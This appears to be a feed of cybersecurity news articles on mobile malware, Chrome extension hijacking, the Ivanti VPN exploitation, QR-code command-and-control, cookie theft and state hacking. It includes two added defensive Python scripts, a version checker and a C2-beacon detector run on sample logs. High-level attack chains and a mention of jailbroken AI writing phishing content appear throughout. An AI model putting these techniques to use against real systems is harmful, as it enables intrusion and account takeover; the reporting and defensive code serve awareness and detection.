Cybercriminals have found a new way to trick smartphone users: fake wedding invitations. According to cybersecurity researchers, a newly discovered malware named Tria is being used to infect Android devices, primarily in Malaysia and Brunei. The attackers disguise malicious links as wedding invitations and send them via WhatsApp and Telegram to unsuspecting victims.

Once a user clicks the link and downloads the application, the malware starts working silently in the background, stealing sensitive personal information.  


How the Malware Works  

This cyberattack has been active since mid-2024. It follows a simple but effective strategy:  

1. The hackers send a fake wedding invitation through group or private chats.  

2. The invitation asks recipients to download an app to access event details.  

3. Once installed, the app secretly collects private information from the victim’s phone.  

The stolen data includes:  

  • Text messages (SMS)  
  • Emails from accounts like Gmail and Outlook 
  • Call history  
  • Messages from apps like WhatsApp and WhatsApp Business  


Cybersecurity experts warn that this stolen data can be used in several ways, including:  

1. Hijacking banking accounts  

2. Resetting passwords for email and social media  

3. Taking over messaging apps to send fraudulent messages  


Why Hackers Want Control of Your Messaging Apps  

One of the biggest concerns is that hackers aim to take control of WhatsApp and Telegram accounts. Once they gain access, they can:  

  • Send malicious links to more people, spreading the malware further.  
  • Pretend to be the victim and ask contacts for money.  
  • Steal private conversations and sensitive business information.  


To process the stolen data, the cybercriminals use Telegram bots (automated systems that collect and sort the information):

  • One bot gathers data from messaging apps and emails.  
  • Another bot handles SMS messages.  

The exact group responsible for this attack is unknown, but cybersecurity researchers suspect that the hackers speak Indonesian. They have not been linked to any specific organization yet.  


Similarities to Previous Attacks  

This type of scam is not entirely new. In 2023, cybersecurity experts discovered a malware campaign called UdangaSteal, which targeted users in Indonesia, Malaysia, and India.  

1. UdangaSteal also used fake invitations and job offers to trick victims.  

2. It mainly focused on stealing SMS messages.  

However, Tria is more advanced because it collects a wider range of data, including emails and instant messaging conversations.  


How to Protect Yourself  

Cybersecurity experts recommend taking extra precautions to avoid falling victim to such scams:  

1. Be cautious of unexpected messages, even from known contacts.  

2. Never download apps from links shared in messaging apps.  

3. Use official app stores (Google Play Store) to download apps.  

4. Enable two-factor authentication (2FA) for your accounts.  

5. Verify invitations by calling or messaging the sender directly.

As online scams grow more intricate, staying vigilant is the best way to protect your personal data. If something seems too unusual or suspicious, it’s best to ignore it.

New 'Browser Syncjacking' Attack Exploits Chrome Extensions for Full Device Takeover

 

Security researchers at SquareX have described a new attack technique called 'Browser Syncjacking,' which allows threat actors to hijack Google profiles, compromise browsers, and eventually gain full control over a victim's device, all through a seemingly harmless Chrome extension.

This stealthy multi-stage attack requires minimal permissions and almost no user interaction beyond installing a malicious Chrome extension. The attack begins with:

1. Fake Google Workspace Setup – Attackers create a fraudulent Google Workspace domain with pre-configured user profiles where security features like multi-factor authentication are disabled.

2. Publishing a Malicious Extension – A Chrome extension, disguised as a useful tool, is uploaded to the Chrome Web Store.

3. Social Engineering Trap – Victims are tricked into installing the extension, which then secretly logs them into an attacker's managed Google Workspace profile via a hidden browser session.

4. Sync Activation – The extension opens a legitimate Google support page and injects content instructing users to enable Chrome Sync. Once activated, attackers gain access to stored credentials, browsing history, and other sensitive data.

5. Full Browser Takeover – Using deceptive tactics, such as a fake Zoom update prompt, the extension delivers an executable file containing an enrollment token. This grants attackers full control over the browser.

"Once enrolled, the attacker gains full control over the victim's browser, allowing them to silently access all web apps, install additional malicious extensions, redirect users to phishing sites, monitor/modify file downloads, and many more," explains SquareX researchers.

By leveraging Chrome's Native Messaging API, attackers establish a direct communication channel between the malicious extension and the victim's operating system. This enables them to:

  • Browse directories
  • Modify files
  • Install malware
  • Execute commands
  • Capture keystrokes
  • Extract sensitive data
  • Activate the webcam and microphone

The Browser Syncjacking attack is difficult to detect. Unlike traditional extension-based threats that require extensive social engineering, this method operates with minimal user interaction.

"Unless the victim is extremely security paranoid and is technically savvy enough to constantly navigate the Chrome settings to look for managed browser labels, there is no real visual indication that a browser has been hijacked," the report warns.

Recent incidents, including hijacks of legitimate Chrome extensions, have demonstrated that browser extensions pose significant cybersecurity risks.

BleepingComputer has reached out to Google for comments on this new attack and will provide updates as soon as a response is received.

Hackers Exploit WordPress Sites to Attack Mac and Windows Users


According to security experts, threat actors are abusing out-of-date versions of WordPress and plug-ins to modify thousands of sites to trap visitors into downloading and installing malware.

In a conversation with cybersecurity news portal TechCrunch, Simon Wijckmans, founder and CEO of the web security company c/side, said the hacking campaign is still “very much live”.

Spray and pray campaign

The hackers aim to distribute malware that steals passwords and sensitive data from Mac and Windows users. According to c/side, some of the hacked websites rank among the most popular on the internet. Himanshu Anand, reporting on the company's findings, described it as a "widespread and very commercialized attack" and told TechCrunch the campaign is a "spray and pray" cyber attack aimed at website visitors rather than a specific group or person.

Once a hacked WordPress site loads in a visitor's browser, its content is immediately replaced with a fake Chrome browser update page that asks the visitor to download and install an update before they can access the site, the researchers say.

Users tricked via fake sites

When a visitor accepts the update, the compromised website serves a malicious file disguised as the update, choosing a Mac or Windows payload depending on the visitor's operating system. The researchers have informed Automattic, the company that makes and distributes WordPress.com, about the campaign and sent it a list of malicious domains.

According to TechCrunch, Megan Fox, spokesperson for Automattic, had not commented by press time. Later, Automattic clarified that the security of third-party plugins is the responsibility of the plugins' own developers.

“There are specific guidelines that plugin authors must consult and adhere to ensure the overall quality of their plugins and the safety of their users,” Ms Fox told TechCrunch. “Authors have access to a Plugin Handbook which covers numerous security topics, including best practices and managing plugin security,” she added. 

c/side has traced over 10,000 sites that may have been targeted by this campaign. The company found the malicious scripts by crawling the internet and using reverse DNS lookups to find domains and sites sharing a small number of IP addresses, which exposed a wider set of domains hosting the scripts. TechCrunch has not independently verified c/side's data, but it did find a WordPress site serving the malicious content earlier this week.

Phishing Attacks Surge by 30% in Australia Amid Growing Cyber Threats

 

Australia witnessed a sharp 30% rise in phishing emails last year, as cybercriminals increasingly targeted the Asia-Pacific (APAC) region, according to a recent study by security firm Abnormal Security. The APAC region’s expanding presence in critical industries, such as data centers and telecommunications, has made it a prime target for cyber threats.

Across APAC, credential phishing attacks surged by 30.5% between 2023 and 2024, with New Zealand experiencing a 30% rise. Japan and Singapore faced even greater increases at 37%. Among all advanced email-based threats—including business email compromise (BEC) and malware attacks—phishing saw the most significant spike.

“The surge in attack volume across the APAC region can likely be attributed to several factors, including the strategic significance of its countries as epicentres for trade, finance, and defence,” said Tim Bentley, Vice President of APJ at Abnormal Security.

“This makes organisations in the region attractive targets for complex email campaigns designed to exploit economic dynamics, disrupt essential industries, and steal sensitive data.”

Between 2023 and 2024, advanced email attacks across APAC—including Australia, New Zealand, Japan, and Singapore—rose by 26.9% on a median monthly basis. The increase was particularly notable between Q1 and Q2 of 2024 (16%) and further escalated from Q2 to Q3 (20%).

While phishing remains the primary attack method, BEC scams—including executive impersonation and payment fraud—grew by 6% year-over-year. A single successful BEC attack cost an average of USD $137,000 in 2023, according to Abnormal Security.

Australia has long been a key target for cybercriminals. A 2023 Rubrik survey revealed that Australian organizations faced the highest data breach rates globally.

Antoine Le Tard, Vice President for Asia-Pacific and Japan at Rubrik, previously noted that Australia’s status as an early adopter of cloud and enterprise security solutions may have led to rapid deployment at the expense of robust cybersecurity measures.

The Australian Signals Directorate reported that only 15% of government agencies met the minimum cybersecurity standards in 2024, a steep drop from 25% in 2023. The reluctance to adopt passkey authentication methods further reflects the cybersecurity maturity challenges in the public sector.

The widespread accessibility of AI chatbots has altered the cybersecurity landscape, making phishing attacks more sophisticated. Even jailbroken AI models enable cybercriminals to create phishing content effortlessly, reducing technical barriers for attackers.

AI-driven cyber threats are on the rise, with AI-powered chatbots listed among the top security risks for 2025. According to Vipre, BEC attacks in Q2 2024 increased by 20% year-over-year, with two-fifths of these scams generated using AI tools.

In June, HP intercepted a malware-laden email campaign featuring a script that was “highly likely” created using generative AI. Cybercriminals are also leveraging AI chatbots to establish trust with victims before launching scams—mirroring how businesses use AI for customer engagement.

FBI Hacks 4,200 Computers to Remove PlugX Malware Linked to Chinese Hackers

 

The FBI has successfully hacked and removed PlugX malware from approximately 4,200 computers across the US in a large-scale cybersecurity operation. The malware, allegedly deployed by the China-based hacking group known as “Mustang Panda” or “Twill Typhoon,” has been used since at least 2012 to steal sensitive information from victims in the US, Asia, and Europe. 

The Department of Justice announced the takedown on Tuesday, highlighting the collaborative efforts with French law enforcement to mitigate the cyber threat and prevent further damage. PlugX malware, which infects Windows computers via USB ports, allows hackers to gain unauthorized access and remotely execute commands on compromised systems. The malware operates stealthily in the background, enabling cybercriminals to exfiltrate data, monitor activity, and take control of infected machines. 

According to the FBI, compromised computers connect to a command-and-control server operated by the attackers, whose IP address is hard-coded into the malware. Since September 2023, at least 45,000 US-based IP addresses have communicated with that server, indicating the wide reach of the campaign. To eliminate the malware, the FBI leveraged the same exploit used by the attackers: after gaining access to the command-and-control infrastructure, agents retrieved the IP addresses of affected devices and issued a native PlugX command instructing the malware to delete itself from compromised systems. 

This command removed all files created by the malware, stopped its operation, and ensured its permanent deletion from the infected machines. The successful execution of this operation marks a significant step in neutralizing the ongoing cyber threat posed by Mustang Panda. This coordinated effort was not the first time the FBI has intervened remotely to remove malicious software from infected systems. 

In 2023, the agency dismantled a network of Qakbot-infected computers by deploying an uninstallation tool to affected devices, effectively neutralizing the botnet. Similarly, in 2021, the FBI took proactive measures to counter the Hafnium hack, which targeted Microsoft Exchange servers, by remotely patching vulnerabilities and securing affected systems. These operations demonstrate the FBI’s evolving approach to addressing cyber threats through direct intervention and international cooperation. 

Despite these successful operations, cybersecurity experts warn that PlugX and similar malware strains continue to pose a significant risk, especially given their ability to spread through USB devices. Organizations and individuals are advised to remain vigilant by implementing strong cybersecurity practices such as regularly updating software, disabling USB autorun features, and using endpoint protection tools to detect and prevent unauthorized access. 

The FBI’s decisive action highlights the persistent threat posed by state-sponsored hacking groups and underscores the importance of international collaboration in combating cybercrime. Moving forward, law enforcement agencies are expected to adopt more aggressive measures to counter cyber threats and protect sensitive information from being exploited by malicious actors.

Hackers Exploit Ivanti VPN Flaw to Install New Malware

 



A newly discovered vulnerability in Ivanti Connect Secure VPN appliances, tracked as CVE-2025-0282, has been actively exploited by hackers to deploy custom malware. This critical security flaw affects older versions of Ivanti’s products, including Connect Secure, Policy Secure, and Neurons for ZTA gateways. Despite the wide impact, Ivanti has said that the attacks are currently limited to a small number of users.

The flaw is a stack-based buffer overflow that attackers can trigger with specially crafted requests. Mandiant, a leading cybersecurity firm, reported that the breaches began in December 2024. Using the flaw, hackers accessed the affected devices, disabled key security settings, and installed malicious software.

New Malware Families Identified

During the investigation, two previously unknown malware families, Dryhook and Phasejam, were found on infected systems. Neither has an established connection to any known hacking group. In addition, the hackers used a toolkit named Spawn, which is also used by suspected Chinese espionage groups. 

Dryhook: This malware captures login credentials, such as usernames and passwords, during the authentication process.

Phasejam: A dropper that installs malicious web shells, allowing hackers to execute commands remotely.  

How the Attack Works  

The attack process involves several steps:  

1. Identifying Targets: Hackers scan devices using specialized HTTP requests to identify vulnerable systems.  

2. Exploitation: They exploit the CVE-2025-0282 flaw to bypass security.

3. Malware Deployment: They disable protections, modify system files, and install tools such as backdoors and tunneling utilities once inside.  

4. Data Theft: They steal sensitive information, including session details and credentials. This data is often archived and staged for transfer via public servers.  

5. Maintaining Access: Hackers alter upgrade processes, making their changes persist even after system updates.

When the vulnerability was discovered, more than 3,600 Ivanti VPN devices were exposed online. Although the number decreased to around 2,800 after the software patch, most systems are still exposed to this threat.

What Can Be Done? 

To defend against this threat, Ivanti advises doing the following:

  • Update Software: Install the latest version of Ivanti Connect Secure, version 22.7R2.5 or newer.
  • Factory Reset: Reset the device to factory settings to wipe out any malware infection.
  • Monitor for Signs of Attack: Use the IoCs and detection rules shared by Mandiant to identify malicious activity.
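As an added example, not code from Ivanti or Mandiant: a small Python triage script that parses Ivanti-style version strings and flags appliances running anything below 22.7R2.5. The version format (major.minor R release.patch, patch optional) is an assumption drawn from the single version string above, and the inventory is constructed.

```python
import re

# Minimum fixed Ivanti Connect Secure version named in the advisory text above.
MIN_FIXED = "22.7R2.5"

# Assumed format: <major>.<minor>R<release>[.<patch>], e.g. 22.7R2.5 or 22.7R2.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?$")

# Constructed inventory (hostname -> reported version); not real appliances.
SAMPLE_INVENTORY = {
    "vpn-a.example": "22.7R2.5",
    "vpn-b.example": "22.7R2.10",   # newer than R2.5, but sorts *before* it as a string
    "vpn-c.example": "22.6R2.3",
    "vpn-d.example": "22.7R2",      # no patch component
    "vpn-e.example": "9.1R18.9",
}


def parse_ics_version(text):
    """Turn '22.7R2.5' into (22, 7, 2, 5); a missing patch number counts as 0."""
    match = VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised Ivanti version string: {text!r}")
    major, minor, release, patch = match.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


def is_patched(version, minimum=MIN_FIXED):
    """True when the appliance runs the minimum fixed release or anything newer.
    Tuple comparison is numeric per component, which avoids the classic mistake
    of comparing version strings lexically ('22.7R2.10' < '22.7R2.5' as text)."""
    return parse_ics_version(version) >= parse_ics_version(minimum)


def triage(inventory, minimum=MIN_FIXED):
    """Split an inventory into (needs_update, up_to_date) lists of hostnames.
    Unparseable versions are treated as needing attention rather than ignored."""
    needs_update, up_to_date = [], []
    for host, version in sorted(inventory.items()):
        try:
            (up_to_date if is_patched(version, minimum) else needs_update).append(host)
        except ValueError:
            needs_update.append(host)
    return needs_update, up_to_date


if __name__ == "__main__":
    stale, current = triage(SAMPLE_INVENTORY)
    print("needs update:", stale)
    print("up to date:  ", current)
```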

Why it Matters

This incident shows how essential it is for organizations to pay close attention to their cybersecurity. Attackers have become highly sophisticated, stealing the most sensitive data from widely used systems such as VPNs. Businesses need to stay alert, keep their systems updated, and revise their security policies frequently to curb these threats.




How Hackers Sell Access to Corporate Systems Using Stolen Credentials

 


In the cybercrime world, Initial Access Brokers (IABs) are essential for facilitating attacks. These specific hackers break into company systems, steal login credentials, and then sell access to other criminals who use it to launch their own attacks. They essentially act as locksmiths for hackers, making it easy for those willing to pay to get into systems.

What Exactly Do IABs Do?

IABs operate as a business, selling stolen access to corporate systems on dark-web markets, private forums, or Telegram channels. The credentials on offer range from basic user logins to the highest administrator accounts. Sellers even offer guarantees, refunding the buyer if the stolen credentials do not work.

This system benefits both inexperienced attackers and advanced hacking groups. For less skilled criminals, IABs provide access to high-value targets they could never reach independently. For seasoned ransomware operators, purchasing pre-stolen access saves time and allows them to focus on deploying malware or stealing sensitive data.

Stolen credentials such as usernames and passwords are a hacker's key to entering a system directly, bypassing the security barriers around it. This is what happened in several major breaches:

  • Geico Case: In 2024, cyber thieves used stolen credentials to access Geico's online tools and compromised sensitive information belonging to 116,000 customers; the company paid millions in fines.
  • ADT Breach: Thieves used the credentials of one of ADT's partners to breach ADT's internal systems twice, exposing customer records and proving that even trusted relationships can be compromised.

According to a report released by IBM in 2024, compromised credentials accounted for nearly 20% of all data breaches and frequently went unnoticed for months, leaving attackers ample time to steal information.


How to Protect Against IABs  

Organizations must adopt proactive measures to counteract these threats:  

1. Threat Intelligence: Tools can monitor underground markets for stolen credentials. If a company’s data appears on these platforms, immediate action, such as forcing password changes, can help minimize damage.

2. Complex Passwords: Companies should enforce rules requiring employees to use complex, unique passwords and to update them regularly. Platforms like Specops Password Policy let companies check credentials against databases of known breached passwords so that compromised passwords cannot be reused.

Although IABs have made cybercrime more efficient, organizations can protect themselves by understanding their tactics and strengthening their defenses. Regular monitoring, strong password practices, and quick responses to breaches are key to staying ahead of these threats. By closing the gaps hackers exploit, companies can make it harder for cybercriminals to succeed.




North Korean Hackers Set New Record with $1.8 Billion Crypto Heist

 


Hackers associated with North Korea have taken cyber theft to a record-breaking level in 2024, stealing $1.8 billion in cryptocurrency. According to a detailed report by blockchain analytics firm Chainalysis, this highlights the growing sophistication of these attackers and the risks they pose to international security, particularly in the United States. Here's a simpler, step-by-step explanation of the issue.

In 2024, more than half of the $3 billion taken from cryptocurrency platforms globally was attributed to North Korean hackers. The figures increased sharply from last year. In 2023, there were 20 incidents that collectively totaled $660.5 million. This year, it skyrocketed to $1.8 billion through 47 incidents.

These hackers are using increasingly advanced strategies to target and steal digital currencies, showcasing their ability to exploit vulnerabilities in cryptocurrency platforms.  


How Do Hackers Launder Stolen Cryptocurrency?  

After stealing funds, the hackers use complex methods to hide the origins of the money. Some common techniques include:

1. Financial Platforms: Services that allow anonymous transactions, making the funds hard to trace.

2. Crypto Mixing Services: Stolen funds are mixed with legitimate ones, hiding their origin.

3. Mining Services: Mining is used to convert stolen funds into harder-to-trace forms.

With these, authorities face challenges tracking and recovering such stolen funds.


Advanced Tools and Phony Jobs

Hackers use deception and advanced tactics in targeting their victims. For example:

  • Remote Work Exploitation: They pose as IT workers and enter companies by working remotely. Recently, 14 North Korean nationals were charged by US authorities for working as fake IT staff in American companies. They allegedly stole over $88 million by manipulating their roles.  
  • Fake Job Websites: These websites appear legitimate and attract people into sharing sensitive information.

On top of this, they use specialized tools to target cryptocurrency platforms, making their operations even more efficient.


Why Does North Korea Do This?

North Korea has been under heavy sanctions from the international community, eliminating many sources of revenue. Cyber theft has become a critical way for the country to generate funds. Although stolen funds declined in 2023 to $1 billion from $1.7 billion in 2022, the sharp increase in 2024 shows that they are not letting up on cybercrime.

This is not just a matter of money; it affects global security. The stolen funds are believed to help North Korea sustain its regime and avoid financial penalties imposed by the global community. US officials and cybersecurity experts warn that these activities are a growing threat to financial systems worldwide.

To remedy this, cryptocurrency sites should enhance their security level. People must also remain vigilant against these types of scams, including false employment advertisements. International cooperation will be needed to address these cybercrimes and safeguard digital financial systems.

In summary, the scale and sophistication of North Korean hackers are on the rise, which calls for stronger defenses and global efforts to curb cyber theft. This story is a wake-up call for governments, businesses, and individuals alike.



Here’s How Hackers Are Using QR Codes to Break Browser Security

 



Browser isolation is a widely used cybersecurity tool designed to protect users from online threats. However, a recent report by Mandiant reveals that attackers have discovered a novel method to bypass this measure by utilizing QR codes for command-and-control (C2) operations.

How Browser Isolation Works

Browser isolation is a security technique that separates a user's browsing activity from their local device. It streams only visual content from web pages into the user's browser, preventing direct interaction with potentially harmful sites or exploits. This can be implemented through cloud-based, on-premises, or local solutions.

Traditionally, attackers rely on HTTP requests to communicate with a C2 server and issue commands to compromised systems. However, browser isolation disrupts this process by streaming only webpage pixels, effectively blocking HTTP-based attack methods.

The QR Code Workaround

To bypass browser isolation, Mandiant researchers devised a technique that embeds command data within QR codes. The process works as follows:

  1. The attacker’s server generates a web page containing a QR code embedded with command data.
  2. A headless browser on the victim’s compromised system renders the page and takes a screenshot of the QR code.
  3. The system decodes the QR code to extract and execute the command.

This approach exploits browser isolation’s reliance on transmitting visual data, allowing the QR code to be captured and decoded without triggering traditional security defenses.

Real-World Proof of Concept

Mandiant demonstrated the attack using tools like Puppeteer and Chrome in headless mode. They further integrated the technique with Cobalt Strike’s External C2 feature, showcasing its practicality. However, the technique has certain limitations:

  • Data Size: QR codes have a limited storage capacity, with a practical limit of about 2,189 bytes per code.
  • Latency: Each operation introduces a delay of approximately five seconds, making it unsuitable for high-bandwidth tasks such as proxying.

Mitigation Strategies

Despite this new attack vector, browser isolation remains a valid and essential security measure. Mandiant recommends a layered defense strategy to mitigate such threats:

  1. Monitor Network Traffic: Detect abnormal low-bandwidth activity, such as iterative HTTP requests.
  2. Identify Automation Tools: Watch for specific flags associated with headless mode in browser sessions.
  3. Layered Security: Combine browser isolation with other cybersecurity measures to strengthen defenses.
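The first two recommendations, as an added example in Python that is not part of Mandiant's report or the original post: it runs over constructed proxy log lines and flags a client that polls one host at a near-constant interval (the roughly five-second cadence above) with responses small enough to be a QR-code page, and notes whether the user agent carries the "HeadlessChrome" marker. Treating that substring as a headless indicator is an assumption of this example, not one of the flags Mandiant describes.

```python
"""Flag proxy-log clients whose traffic looks like pixel/QR-based C2 polling:
metronomic, low-bandwidth requests to a single host, possibly from a headless browser."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev
from urllib.parse import urlparse

MIN_REQUESTS = 5         # at least this many polls to one host before we care
MAX_JITTER = 0.25        # pstdev/mean of inter-request gaps; C2 polling is very regular
MAX_MEDIAN_BYTES = 4096  # a QR code carries ~2 KB at most, so replies stay tiny
HEADLESS_MARKERS = ("HeadlessChrome",)  # assumption: UA substring of headless Chrome

# Constructed sample proxy log (not real traffic). Fields, space-separated:
# ISO timestamp, client IP, method, URL, response bytes, user agent (may contain spaces).
SAMPLE_LOG = """\
2025-01-10T09:00:00 10.0.0.7 GET https://c2.example/poll 1840 Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/120.0.0.0
2025-01-10T09:00:05 10.0.0.7 GET https://c2.example/poll 1852 Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/120.0.0.0
2025-01-10T09:00:10 10.0.0.7 GET https://c2.example/poll 1837 Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/120.0.0.0
2025-01-10T09:00:16 10.0.0.7 GET https://c2.example/poll 1901 Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/120.0.0.0
2025-01-10T09:00:21 10.0.0.7 GET https://c2.example/poll 1844 Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/120.0.0.0
2025-01-10T09:00:26 10.0.0.7 GET https://c2.example/poll 1866 Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/120.0.0.0
2025-01-10T09:00:01 10.0.0.9 GET https://news.example/ 53120 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0
2025-01-10T09:00:02 10.0.0.9 GET https://cdn.example/app.js 210004 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0
2025-01-10T09:01:30 10.0.0.9 GET https://news.example/article 48211 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0
2025-01-10T09:03:12 10.0.0.9 GET https://shop.example/ 77300 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0
"""


def parse_log(text):
    """Parse the constructed log format into event dicts."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, ip, method, url, size, ua = line.split(" ", 5)
        events.append({
            "time": datetime.fromisoformat(ts),
            "client": ip,
            "method": method,
            "host": urlparse(url).netloc,
            "bytes": int(size),
            "ua": ua,
        })
    return events


def is_headless(ua):
    """Recommendation 2: look for an automation/headless marker in the user agent."""
    return any(marker in ua for marker in HEADLESS_MARKERS)


def find_beacons(events, min_requests=MIN_REQUESTS, max_jitter=MAX_JITTER,
                 max_median_bytes=MAX_MEDIAN_BYTES):
    """Recommendation 1: group by (client, host) and flag regular, tiny-response polling."""
    groups = defaultdict(list)
    for event in events:
        groups[(event["client"], event["host"])].append(event)

    findings = []
    for (client, host), evs in groups.items():
        if len(evs) < min_requests:
            continue
        evs.sort(key=lambda e: e["time"])
        gaps = [(b["time"] - a["time"]).total_seconds() for a, b in zip(evs, evs[1:])]
        avg_gap = mean(gaps)
        if avg_gap <= 0:
            continue  # duplicate timestamps; not a polling pattern we can score
        jitter = pstdev(gaps) / avg_gap
        med_bytes = median([e["bytes"] for e in evs])
        if jitter <= max_jitter and med_bytes <= max_median_bytes:
            findings.append({
                "client": client,
                "host": host,
                "requests": len(evs),
                "mean_interval_s": round(avg_gap, 2),
                "median_bytes": med_bytes,
                "headless": any(is_headless(e["ua"]) for e in evs),
            })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```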

Conclusion

This novel attack demonstrates the evolving nature of cybersecurity threats and the need for constant vigilance. Organizations should adopt a comprehensive approach, including education and robust protection strategies, to defend against emerging threats effectively. Browser isolation remains an important tool when integrated into a layered security framework.

Russia and China Up Their Cyberattacks on Dutch Infrastructure, Security Report Warns

 


Dutch security authorities have recorded growing cyber threats from state-affiliated Russian and Chinese hackers targeting organisations in the country. The attacks, mostly to gain access to the critical infrastructure, are seen as preparations for future sabotage and for gathering sensitive information, according to a recent report by the Dutch National Coordinator for Security and Counterterrorism (NCTV).


Rise of Non-State Hackers in Support of Government Agendas

The report says cyber attacks can no longer be considered the preserve of state actors: non-state hackers in Russia and China are increasingly joining in. In Russia's case, hacktivists, independent hacking groups with no official link to the government, are said to have carried out part of the past year's cyber espionage and sabotage. At times, Russian state cyber actors work alongside them, sometimes using them as cover for their own operations, sometimes directing them toward state goals.

China's cyber operations often combine state intelligence resources with academic and corporate collaborations. Sometimes, persons are performing dual roles: conducting research or scientific duties coupled with pushing forward China's intelligence goals. Such close cooperation treads the fine line between private and state operations, introducing an element of complexity to China's cyber strategy.


China's Advancing Sabotage Capabilities

For some years now, Chinese cyber campaigns focused on espionage, including those targeting the Netherlands and its allies, have been well known. Over the past year, however, China's cyber strategy has become broader in scope and more sophisticated. The "Volt Typhoon" campaign, attributed to China, marked a shift toward actual sabotage, with critical U.S. infrastructure as its chief target. Although Europe is not currently facing such threats from Volt Typhoon, the Netherlands remains vigilant given China's rapid advances in cyber capabilities, which could be deployed globally at a later stage.


Cyber/Disinformation Combined Threat

Pieter-Jaap Aalbersberg, the Dutch National Coordinator for Security and Counterterrorism, underscored that cyber threats frequently form part of an integrated approach that also includes information operations. Coordinated actions are riskier because a cyber attack and a digital influence operation together compromise security more than either alone. Aalbersberg said the risks need to be weighed collectively, both the direct cyber threats and their wider consequences.


Recent Breach in Dutch Police Forces Concerns

Earlier this month, the Dutch national police announced a breach exposing the personal contact details of thousands of officers, including names, telephone numbers, and email addresses. The attackers behind this breach are unknown, although the incident is believed "very likely" to have been carried out by a state-sponsored group. No country was named.

The Dutch government views this heightened cyber hostility as a call for a stronger defensive response in the cybersecurity field, particularly as the threats from Russia and China keep multiplying. The situation makes a strong case for added fortifications, closer international cooperation, and greater action to stop these expanding cyber-warfare operations.


FBI Warns of Cybercriminals Stealing Cookies to Bypass Security

 

Cybercriminals are now targeting cookies, specifically the “remember-me” type, to gain unauthorized access to email accounts. These small files store login state so that users do not have to repeat multi-factor authentication (MFA) on every visit. However, when a hacker obtains these cookies, they can use them to circumvent security layers and take control of accounts. The FBI has alerted the public, noting that hackers often obtain these cookies through phishing links or malicious websites that plant harmful software on devices. Cookies allow websites to retain login details, avoiding repeated authentication. 

By exploiting them, hackers effectively skip the need for usernames, passwords, or MFA, thus streamlining the process for unauthorized entry. This is particularly concerning as MFA typically acts as a crucial security measure against unwanted access. But when hackers use the “remember-me” cookies, this layer becomes ineffective, making it an appealing route for cybercriminals. A primary concern is that many users unknowingly share these cookies by clicking phishing links or accessing unsecured sites. Cybercriminals then capitalize on these actions, capturing cookies from compromised devices to access email accounts and other sensitive areas. 

This type of attack is less detectable because it bypasses traditional security notifications or alerts for suspicious login attempts, providing hackers with direct, uninterrupted access to accounts. To combat this, the FBI recommends practical steps, including regularly clearing browser cookies, which removes saved login data and can interrupt unauthorized access. Another strong precaution is to avoid questionable links and sites, as they often disguise harmful software. Additionally, users should confirm that the websites they visit are secure, checking for HTTPS in the URL, which signals a more protected connection. 

Monitoring login histories on email and other sensitive accounts is another defensive action. Keeping an eye on recent activity can help users identify unusual login patterns or locations, alerting them to possible breaches. If unexpected entries appear, changing passwords and re-enabling MFA is advisable. Taking these actions collectively strengthens an account’s defenses, reducing the chance of cookie-based intrusions. While “remember-me” cookies bring convenience, their risks in today’s cyber landscape are notable. 

The FBI’s warning underlines the importance of digital hygiene—frequently clearing cookies, avoiding dubious sites, and practicing careful online behavior are essential habits to safeguard personal information.